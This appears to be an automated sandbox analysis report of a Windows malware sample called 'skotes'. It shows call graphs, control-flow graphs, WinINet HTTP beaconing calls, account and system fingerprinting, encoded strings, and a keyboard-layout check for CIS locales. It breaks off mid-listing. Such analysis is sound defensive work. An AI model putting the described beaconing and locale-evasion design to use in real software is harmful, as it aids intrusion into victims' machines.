                                                 11858 726243 RegEnumValueA -> 11860
                                                 11862 72be82
                                                 11865 72c22e shared_ptr
                                                 11863
72be96 Sleep InternetOpenW InternetConnectA 11862->11863 11862->11865 11864 72bf18 11863->11864 11866 72bf2e HttpOpenRequestA 11864->11866 11865->11842 11867 72bf4c shared_ptr 11866->11867 11868 72bfee HttpSendRequestA 11867->11868 11870 72c006 shared_ptr 11868->11870 11869 72c08e InternetReadFile 11871 72c0b5 11869->11871 11870->11869 11872 736c70 11873 736ca0 11872->11873 11876 7347b0 11873->11876 11875 736cec Sleep 11875->11873 11879 7347eb 11876->11879 11891 734e70 shared_ptr 11876->11891 11877 734f59 shared_ptr 11877->11875 11880 72be30 6 API calls 11879->11880 11879->11891 11890 734843 shared_ptr __dosmaperr 11880->11890 11881 735015 shared_ptr 11882 7350de shared_ptr 11881->11882 11886 736c46 11881->11886 11906 727d30 11882->11906 11884 7350ed 11910 728380 11884->11910 11887 7347b0 11 API calls 11886->11887 11889 736cec Sleep 11887->11889 11888 72be30 6 API calls 11892 734b62 shared_ptr 11888->11892 11889->11886 11890->11888 11890->11891 11891->11877 11902 7265e0 11891->11902 11892->11891 11895 734390 11892->11895 11894 735106 shared_ptr 11894->11875 11896 7343d2 11895->11896 11897 734646 11896->11897 11900 7343f8 shared_ptr 11896->11900 11899 733640 8 API calls 11897->11899 11898 734610 shared_ptr 11898->11891 11899->11898 11900->11898 11914 733640 11900->11914 11905 4b40b32 11902->11905 11903 72663f LookupAccountNameA 11904 726692 shared_ptr 11903->11904 11904->11881 11905->11903 11907 727d96 shared_ptr __cftof 11906->11907 11908 727ed3 GetNativeSystemInfo 11907->11908 11909 727ed7 shared_ptr 11907->11909 11908->11909 11909->11884 11911 7283e5 shared_ptr __cftof 11910->11911 11912 728524 GetNativeSystemInfo 11911->11912 11913 728403 11911->11913 11912->11913 11913->11894 11915 73367f shared_ptr __dosmaperr 11914->11915 11918 733ba2 shared_ptr std::_Xinvalid_argument 11914->11918 11916 733f42 11915->11916 11915->11918 11919 733c8d 11915->11919 11930 732f10 11916->11930 11918->11900 11921 731ec0 11919->11921 11924 731f5b shared_ptr __dosmaperr 11921->11924 
11922 72e530 6 API calls 11923 732a26 shared_ptr std::_Xinvalid_argument 11922->11923 11923->11918 11924->11923 11925 731f68 11924->11925 11926 7328c1 11924->11926 11925->11922 11927 72e530 6 API calls 11926->11927 11928 732933 11927->11928 11928->11923 11929 725ee0 2 API calls 11928->11929 11929->11923 11931 732f54 11930->11931 11932 72e530 6 API calls 11931->11932 11934 733513 shared_ptr __dosmaperr 11932->11934 11933 73360a shared_ptr std::_Xinvalid_argument 11933->11918 11934->11933 11935 733f42 11934->11935 11937 733c8d 11934->11937 11936 732f10 8 API calls 11935->11936 11936->11933 11938 731ec0 8 API calls 11937->11938 11938->11933 11972 73a210 11973 73a290 11972->11973 11979 7371d0 11973->11979 11975 73a2cc shared_ptr 11976 73a4be shared_ptr 11975->11976 11983 723ee0 11975->11983 11978 73a4a6 11981 737211 __cftof 11979->11981 11980 737446 11980->11975 11981->11980 11989 722ec0 11981->11989 11984 723f48 11983->11984 11988 723f1e 11983->11988 11985 723f58 11984->11985 12086 722c00 11984->12086 11985->11978 11988->11978 11990 722f06 11989->11990 11995 722f6f 11989->11995 12023 73c6ac 11990->12023 11993 72301e 12026 73c26a 11993->12026 11994 722fef 11994->11980 11995->11994 12000 73c6ac GetSystemTimePreciseAsFileTime 11995->12000 11997 723024 11998 73c26a 3 API calls 11997->11998 12001 722fb9 11998->12001 11999 722f1d __Mtx_unlock 11999->11995 11999->11997 12000->12001 12002 73c26a 3 API calls 12001->12002 12003 722fc0 __Mtx_unlock 12001->12003 12002->12003 12004 73c26a 3 API calls 12003->12004 12005 722fd8 __Cnd_broadcast 12003->12005 12004->12005 12005->11994 12006 73c26a 3 API calls 12005->12006 12007 72303c 12006->12007 12008 73c6ac GetSystemTimePreciseAsFileTime 12007->12008 12018 723080 shared_ptr __Mtx_unlock 12008->12018 12009 7231c5 12010 73c26a 3 API calls 12009->12010 12011 7231cb 12010->12011 12012 73c26a 3 API calls 12011->12012 12013 7231d1 12012->12013 12014 73c26a 3 API calls 12013->12014 12020 723193 __Mtx_unlock 12014->12020 12015 7231a7 
12015->11980 12016 73c26a 3 API calls 12017 7231dd 12016->12017 12018->12009 12018->12011 12018->12015 12019 73c6ac GetSystemTimePreciseAsFileTime 12018->12019 12021 72315f 12019->12021 12020->12015 12020->12016 12021->12009 12021->12013 12021->12020 12030 73bd4c 12021->12030 12033 73c452 12023->12033 12025 722f12 12025->11993 12025->11999 12027 73c292 12026->12027 12028 73c274 12026->12028 12027->12027 12028->12027 12050 73c297 12028->12050 12080 73bb72 12030->12080 12032 73bd5c 12032->12021 12034 73c4a8 12033->12034 12036 73c47a 12033->12036 12034->12036 12039 73cf6b 12034->12039 12036->12025 12037 73c4fd __Xtime_diff_to_millis2 12037->12036 12038 73cf6b _xtime_get GetSystemTimePreciseAsFileTime 12037->12038 12038->12037 12040 73cf7a 12039->12040 12042 73cf87 __aulldvrm 12039->12042 12040->12042 12043 73cf44 12040->12043 12042->12037 12046 73cbea 12043->12046 12047 73cbfb GetSystemTimePreciseAsFileTime 12046->12047 12049 73cc07 12046->12049 12047->12049 12049->12042 12053 722ae0 12050->12053 12052 73c2ae std::_Throw_future_error 12052->12028 12059 73bedf 12053->12059 12055 722aff 12055->12052 12056 722af4 12056->12055 12062 758bec 12056->12062 12058 756cf6 12068 73cc31 12059->12068 12063 758bf1 12062->12063 12066 758bfc 12063->12066 12072 75d634 12063->12072 12077 7565ed 12066->12077 12067 758c2f __dosmaperr 12067->12058 12069 73cc3f InitOnceExecuteOnce 12068->12069 12071 73bef2 12068->12071 12069->12071 12071->12056 12073 75d640 12072->12073 12074 7565ed 2 API calls 12073->12074 12075 75d69c __cftof __dosmaperr 12073->12075 12076 75d82e __dosmaperr 12074->12076 12075->12066 12076->12066 12078 7564c7 2 API calls 12077->12078 12079 7565fe 12078->12079 12079->12067 12081 73bb9c 12080->12081 12082 73cf6b _xtime_get GetSystemTimePreciseAsFileTime 12081->12082 12083 73bba4 __Xtime_diff_to_millis2 12081->12083 12084 73bbcf __Xtime_diff_to_millis2 12082->12084 12083->12032 12084->12083 12085 73cf6b _xtime_get GetSystemTimePreciseAsFileTime 12084->12085 12085->12083 
12087 722c0e 12086->12087 12093 73b847 12087->12093 12089 722c42 12090 722c49 12089->12090 12099 722c80 12089->12099 12090->11978 12092 722c58 std::_Throw_future_error 12094 73b854 12093->12094 12095 73b873 Concurrency::details::_Reschedule_chore 12093->12095 12102 73cb77 12094->12102 12095->12089 12097 73b864 12097->12095 12104 73b81e 12097->12104 12110 73b7fb 12099->12110 12101 722cb2 shared_ptr 12101->12092 12103 73cb92 CreateThreadpoolWork 12102->12103 12103->12097 12105 73b827 Concurrency::details::_Reschedule_chore 12104->12105 12108 73cdcc 12105->12108 12107 73b841 12107->12095 12109 73cde1 TpPostWork 12108->12109 12109->12107 12111 73b807 12110->12111 12113 73b817 12110->12113 12111->12113 12114 73ca78 12111->12114 12113->12101 12115 73ca8d TpReleaseWork 12114->12115 12115->12113 12164 7393e0 12165 7393f5 12164->12165 12169 739433 12164->12169 12166 73d111 SleepConditionVariableCS 12165->12166 12167 7393ff 12166->12167 12168 73d0c7 RtlWakeAllConditionVariable 12167->12168 12167->12169 12168->12169 12170 7387d0 12171 73882a __cftof 12170->12171 12177 739bb0 12171->12177 12173 738854 12174 73886c 12173->12174 12181 7243f0 12173->12181 12176 7388d9 std::_Throw_future_error 12178 739be5 12177->12178 12187 722ce0 12178->12187 12180 739c16 12180->12173 12182 73bedf InitOnceExecuteOnce 12181->12182 12183 72440a 12182->12183 12184 724411 12183->12184 12185 756cbb 2 API calls 12183->12185 12184->12176 12186 724424 12185->12186 12188 722d1d 12187->12188 12189 73bedf InitOnceExecuteOnce 12188->12189 12190 722d46 12189->12190 12191 722d51 12190->12191 12192 722d88 12190->12192 12196 73bef7 12190->12196 12191->12180 12203 722440 12192->12203 12197 73bf03 std::_Throw_future_error 12196->12197 12198 73bf73 12197->12198 12199 73bf6a 12197->12199 12201 722ae0 3 API calls 12198->12201 12206 73be7f 12199->12206 12202 73bf6f 12201->12202 12202->12192 12216 73b5d6 12203->12216 12205 722472 12207 73cc31 InitOnceExecuteOnce 12206->12207 12208 73be97 12207->12208 12209 73be9e 
12208->12209 12212 756cbb 12208->12212 12209->12202 12213 756cc7 12212->12213 12214 758bec 2 API calls 12213->12214 12215 756cf6 12214->12215 12218 73b5f1 std::_Throw_future_error 12216->12218 12217 758bec 2 API calls 12219 73b69f 12217->12219 12218->12217 12220 73b658 12218->12220 12220->12205 12125 73b8b9 12132 73b7b5 12125->12132 12127 73b906 12144 73b718 12127->12144 12128 73b8e1 Concurrency::details::_Reschedule_chore 12128->12127 12140 73cbae 12128->12140 12131 73b91e 12133 73b7c1 Concurrency::details::_Reschedule_chore 12132->12133 12134 73b7f2 12133->12134 12135 73c6ac GetSystemTimePreciseAsFileTime 12133->12135 12134->12128 12136 73b7d6 12135->12136 12154 722b10 12136->12154 12138 73b7dc __Mtx_unlock 12139 722b10 3 API calls 12138->12139 12139->12134 12141 73cbcc 12140->12141 12142 73cbbc TpCallbackUnloadDllOnCompletion 12140->12142 12141->12127 12142->12141 12145 73b724 Concurrency::details::_Reschedule_chore 12144->12145 12146 73b77e 12145->12146 12147 73c6ac GetSystemTimePreciseAsFileTime 12145->12147 12146->12131 12148 73b739 12147->12148 12149 722b10 3 API calls 12148->12149 12150 73b73f __Mtx_unlock 12149->12150 12151 722b10 3 API calls 12150->12151 12152 73b75c __Cnd_broadcast 12151->12152 12152->12146 12153 722b10 3 API calls 12152->12153 12153->12146 12155 722b1a 12154->12155 12156 722b1c 12154->12156 12155->12138 12157 73c26a 3 API calls 12156->12157 12158 722b22 ___std_exception_copy 12157->12158 12158->12138 11957 756629 11960 7564c7 11957->11960 11962 7564d5 11960->11962 11961 756520 11962->11961 11965 75652b 11962->11965 11970 75a302 GetPEB 11965->11970 11967 756535 11968 75653a GetPEB 11967->11968 11969 75654a 11967->11969 11968->11969 11971 75a31c 11970->11971 11971->11967 12159 73b92e 12160 73b7b5 4 API calls 12159->12160 12161 73b956 12160->12161 12162 73b718 4 API calls 12161->12162 12163 73b96f 12162->12163

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 766 72be30-72be7c 767 72be82-72be86 766->767 768 72c281-72c2a6 call 7380c0 766->768 767->768 770 72be8c-72be90 767->770 773 72c2d4-72c2ec 768->773 774 72c2a8-72c2b4 768->774 770->768 772 72be96-72bf2a Sleep InternetOpenW InternetConnectA call 737a00 call 725c10 770->772 797 72bf2e-72bf4a HttpOpenRequestA 772->797 798 72bf2c 772->798 778 72c2f2-72c2fe 773->778 779 72c238-72c250 773->779 776 72c2b6-72c2c4 774->776 777 72c2ca-72c2d1 call 73d663 774->777 776->777 781 72c34f-72c354 call 756c6a 776->781 777->773 783 72c304-72c312 778->783 784 72c22e-72c235 call 73d663 778->784 785 72c323-72c33f call 73cff1 779->785 786 72c256-72c262 779->786 783->781 793 72c314 783->793 784->779 794 72c268-72c276 786->794 795 72c319-72c320 call 73d663 786->795 793->784 794->781 796 72c27c 794->796 795->785 796->795 803 72bf7b-72bfea call 737a00 call 725c10 call 737a00 call 725c10 797->803 804 72bf4c-72bf5b 797->804 798->797 818 72bfee-72c004 HttpSendRequestA 803->818 819 72bfec 803->819 806 72bf71-72bf78 call 73d663 804->806 807 72bf5d-72bf6b 804->807 806->803 807->806 820 72c006-72c015 818->820 821 72c035-72c05d 818->821 819->818 822 72c017-72c025 820->822 823 72c02b-72c032 call 73d663 820->823 824 72c08e-72c0af InternetReadFile 821->824 825 72c05f-72c06e 821->825 822->823 823->821 829 72c0b5 824->829 827 72c070-72c07e 825->827 828 72c084-72c08b call 73d663 825->828 827->828 828->824 830 72c0c0-72c170 call 754250 829->830
                                                APIs
                                                • Sleep.KERNELBASE(000005DC), ref: 0072BEB8
                                                • InternetOpenW.WININET(00778DC8,00000000,00000000,00000000,00000000), ref: 0072BEC8
                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0072BEEC
                                                • HttpOpenRequestA.WININET(?,00000000), ref: 0072BF35
                                                • HttpSendRequestA.WININET(?,00000000), ref: 0072BFF6
                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 0072C0A8
                                                • InternetCloseHandle.WININET(?), ref: 0072C187
                                                • InternetCloseHandle.WININET(?), ref: 0072C18F
                                                • InternetCloseHandle.WININET(?), ref: 0072C197
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                • API String ID: 2167506142-2254971868
                                                • Opcode ID: 420a23ae9579ff169170baada88cedd4886a77945224437527f271b51df3e588
                                                • Instruction ID: 914c59c8b89832e69acfdcec066d9c55595b7fcba85acfe9038e9bdcc7edec63
                                                • Opcode Fuzzy Hash: 420a23ae9579ff169170baada88cedd4886a77945224437527f271b51df3e588
                                                • Instruction Fuzzy Hash: 03B116B1A00128DBEB29CF28DC89BDD7BB5EF51304F508599F508972C2DB799AC0CB95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1161 7265e0-726639 1235 72663a call 4b40bf4 1161->1235 1236 72663a call 4b40be4 1161->1236 1237 72663a call 4b40c55 1161->1237 1238 72663a call 4b40bb7 1161->1238 1239 72663a call 4b40c72 1161->1239 1240 72663a call 4b40b32 1161->1240 1241 72663a call 4b40bc3 1161->1241 1242 72663a call 4b40bae 1161->1242 1243 72663a call 4b40c88 1161->1243 1244 72663a call 4b40ca9 1161->1244 1245 72663a call 4b40b99 1161->1245 1246 72663a call 4b40c2a 1161->1246 1162 72663f-7266b8 LookupAccountNameA call 737a00 call 725c10 1168 7266ba 1162->1168 1169 7266bc-7266db call 7222c0 1162->1169 1168->1169 1172 72670c-726712 1169->1172 1173 7266dd-7266ec 1169->1173 1176 726715-72671a 1172->1176 1174 726702-726709 call 73d663 1173->1174 1175 7266ee-7266fc 1173->1175 1174->1172 1175->1174 1177 726937 call 756c6a 1175->1177 1176->1176 1179 72671c-726744 call 737a00 call 725c10 1176->1179 1184 72693c call 756c6a 1177->1184 1189 726746 1179->1189 1190 726748-726769 call 7222c0 1179->1190 1188 726941-726946 call 756c6a 1184->1188 1189->1190 1195 72679a-7267ae 1190->1195 1196 72676b-72677a 1190->1196 1202 7267b4-7267ba 1195->1202 1203 726858-72687c 1195->1203 1197 726790-726797 call 73d663 1196->1197 1198 72677c-72678a 1196->1198 1197->1195 1198->1184 1198->1197 1204 7267c0-7267ed call 737a00 call 725c10 1202->1204 1205 726880-726885 1203->1205 1218 7267f1-726818 call 7222c0 1204->1218 1219 7267ef 1204->1219 1205->1205 1206 726887-7268ec call 7380c0 * 2 1205->1206 1216 726919-726936 call 73cff1 1206->1216 1217 7268ee-7268fd 1206->1217 1220 72690f-726916 call 73d663 1217->1220 1221 7268ff-72690d 1217->1221 1228 72681a-726829 1218->1228 1229 726849-72684c 1218->1229 1219->1218 1220->1216 1221->1188 1221->1220 1231 72682b-726839 1228->1231 1232 72683f-726846 call 73d663 1228->1232 1229->1204 1230 726852 1229->1230 1230->1203 1231->1177 1231->1232 1232->1229 1235->1162 1236->1162 1237->1162 1238->1162 1239->1162 1240->1162 1241->1162 
1242->1162 1243->1162 1244->1162 1245->1162 1246->1162
                                                APIs
                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00726680
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AccountLookupName
                                                • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                                • API String ID: 1484870144-2309319047
                                                • Opcode ID: 6949c18e62a1db48184a147c54fa0cfd3d6e30e48455a5dac856b9e2f58146c8
                                                • Instruction ID: 0ca5d2b65f0d7f6a951a210231510adcf81e91258db4d6afe18ebc7b8f57448e
                                                • Opcode Fuzzy Hash: 6949c18e62a1db48184a147c54fa0cfd3d6e30e48455a5dac856b9e2f58146c8
                                                • Instruction Fuzzy Hash: 0A91D5B1900128DBDB28DB28DC89BDDB779EB45304F4045E9E51997282EB399FC4CFA4
                                                APIs
                                                  • Part of subcall function 00737A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00737AEC
                                                  • Part of subcall function 00737A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00737AF8
                                                  • Part of subcall function 00737A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00737B01
                                                  • Part of subcall function 0072BE30: Sleep.KERNELBASE(000005DC), ref: 0072BEB8
                                                  • Part of subcall function 0072BE30: InternetOpenW.WININET(00778DC8,00000000,00000000,00000000,00000000), ref: 0072BEC8
                                                  • Part of subcall function 0072BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0072BEEC
                                                  • Part of subcall function 0072BE30: HttpOpenRequestA.WININET(?,00000000), ref: 0072BF35
                                                • std::_Xinvalid_argument.LIBCPMT ref: 00734F92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                                • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
                                                • API String ID: 4201286991-1982281295
                                                • Opcode ID: 933228a0c53a5a9d57a469fb30b38cd2dba6accd0011bee40f80b99eb281b08d
                                                • Instruction ID: b85d4c52a5f6b09228b5e8aa16e463e1075f8582a9c1866b6798072652c69ea5
                                                • Opcode Fuzzy Hash: 933228a0c53a5a9d57a469fb30b38cd2dba6accd0011bee40f80b99eb281b08d
                                                • Instruction Fuzzy Hash: 8423E371E00258DBEB29DB28CD8979DBB76AB81304F5481D8E049A7287EB395F84CF51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 921 725ee0-725fde 927 725fe0-725fec 921->927 928 726008-726015 call 73cff1 921->928 929 725ffe-726005 call 73d663 927->929 930 725fee-725ffc 927->930 929->928 930->929 932 726016-72619d call 756c6a call 73e150 call 7380c0 * 5 RegOpenKeyExA 930->932 950 7261a3-726233 call 7540f0 932->950 951 7264b1-7264ba 932->951 981 726239-72623d 950->981 982 72649f-7264ab 950->982 952 7264e7-7264f0 951->952 953 7264bc-7264c7 951->953 957 7264f2-7264fd 952->957 958 72651d-726526 952->958 955 7264c9-7264d7 953->955 956 7264dd-7264e4 call 73d663 953->956 955->956 960 7265d7-7265df call 756c6a 955->960 956->952 962 726513-72651a call 73d663 957->962 963 7264ff-72650d 957->963 964 726553-72655c 958->964 965 726528-726533 958->965 962->958 963->960 963->962 967 726585-72658e 964->967 968 72655e-726569 964->968 972 726535-726543 965->972 973 726549-726550 call 73d663 965->973 978 726590-72659f 967->978 979 7265bb-7265d6 call 73cff1 967->979 976 72657b-726582 call 73d663 968->976 977 72656b-726579 968->977 972->960 972->973 973->964 976->967 977->960 977->976 985 7265b1-7265b8 call 73d663 978->985 986 7265a1-7265af 978->986 988 726243-726279 RegEnumValueA 981->988 989 726499 981->989 982->951 985->979 986->960 986->985 991 726486-72648d 988->991 992 72627f-72629e 988->992 989->982 991->988 997 726493 991->997 996 7262a0-7262a5 992->996 996->996 999 7262a7-7262fb call 7380c0 call 737a00 * 2 call 725d50 996->999 997->989 999->991
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                • API String ID: 0-3963862150
                                                • Opcode ID: f418214252b6f22b535e62dea06aceb690a5407ec9ed426e3752a5911a647913
                                                • Instruction ID: a67892b5ee1d35ae41e56d4579a192ec2bfb9bed98089c453d07f3acae58bf07
                                                • Opcode Fuzzy Hash: f418214252b6f22b535e62dea06aceb690a5407ec9ed426e3752a5911a647913
                                                • Instruction Fuzzy Hash: 21D1B0719002689BEB24DF64CC89BDEB7B9EF04340F5042D9F508E7292DB789BA48F55

                                                Control-flow Graph

                                                 control_flow_graph 1007 727d30-727db2 call 7540f0 1011 728356-728373 call 73cff1 1007->1011 1012 727db8-727de0 call 737a00 call 725c10 1007->1012 1019 727de2 1012->1019 1020 727de4-727e06 call 737a00 call 725c10 1012->1020 1019->1020 1025 727e0a-727e23 1020->1025 1026 727e08 1020->1026 1029 727e54-727e7f 1025->1029 1030 727e25-727e34 1025->1030 1026->1025 1031 727eb0-727ed1 1029->1031 1032 727e81-727e90 1029->1032 1033 727e36-727e44 1030->1033 1034 727e4a-727e51 call 73d663 1030->1034 1037 727ed3-727ed5 GetNativeSystemInfo 1031->1037 1038 727ed7-727edc 1031->1038 1035 727e92-727ea0 1032->1035 1036 727ea6-727ead call 73d663 1032->1036 1033->1034 1039 728374 call 756c6a 1033->1039 1034->1029 1035->1036 1035->1039 1036->1031 1042 727edd-727ee6 1037->1042 1038->1042 1049 728379-72837f call 756c6a 1039->1049 1047 727f04-727f07 1042->1047 1048 727ee8-727eef 1042->1048 1053 7282f7-7282fa 1047->1053 1054 727f0d-727f16 1047->1054 1051 728351 1048->1051 1052 727ef5-727eff 1048->1052 1051->1011 1057 72834c 1052->1057 1053->1051 1055 7282fc-728305 1053->1055 1058 727f18-727f24 1054->1058 1059 727f29-727f2c 1054->1059 1060 728307-72830b 1055->1060 1061 72832c-72832f 1055->1061 1057->1051 1058->1057 1062 727f32-727f39 1059->1062 1063 7282d4-7282d6 1059->1063 1064 728320-72832a 1060->1064 1065 72830d-728312 1060->1065 1068 728331-72833b 1061->1068 1069 72833d-728349 1061->1069 1066 728019-7282bd call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 call 737a00 call 725c10 call 725730 call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 call 737a00 call 725c10 call 725730 call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 call 737a00 call 725c10 call 725730 call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 call 737a00 call 725c10 call 725730 1062->1066 1067 727f3f-727f9b call 737a00 call 725c10 call 737a00 call 725c10 call 725d50 1062->1067 1070 7282e4-7282e7 1063->1070 1071 7282d8-7282e2 1063->1071 1064->1051 1065->1064 1072 728314-72831e 1065->1072 1106 7282c3-7282cc 1066->1106 1093 727fa0-727fa7 1067->1093 1068->1051 1069->1057 1070->1051 1075 7282e9-7282f5 1070->1075 1071->1057 1072->1051 1075->1057 1095 727fab-727fcb call 758bbe 1093->1095 1096 727fa9 1093->1096 1101 728002-728004 1095->1101 1102 727fcd-727fdc 1095->1102 1096->1095 1101->1106 1107 72800a-728014 1101->1107 1104 727ff2-727fff call 73d663 1102->1104 1105 727fde-727fec 1102->1105 1104->1101 1105->1049 1105->1104 1106->1053 1111 7282ce 1106->1111 1107->1106 1111->1063
                                                APIs
                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00727ED3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
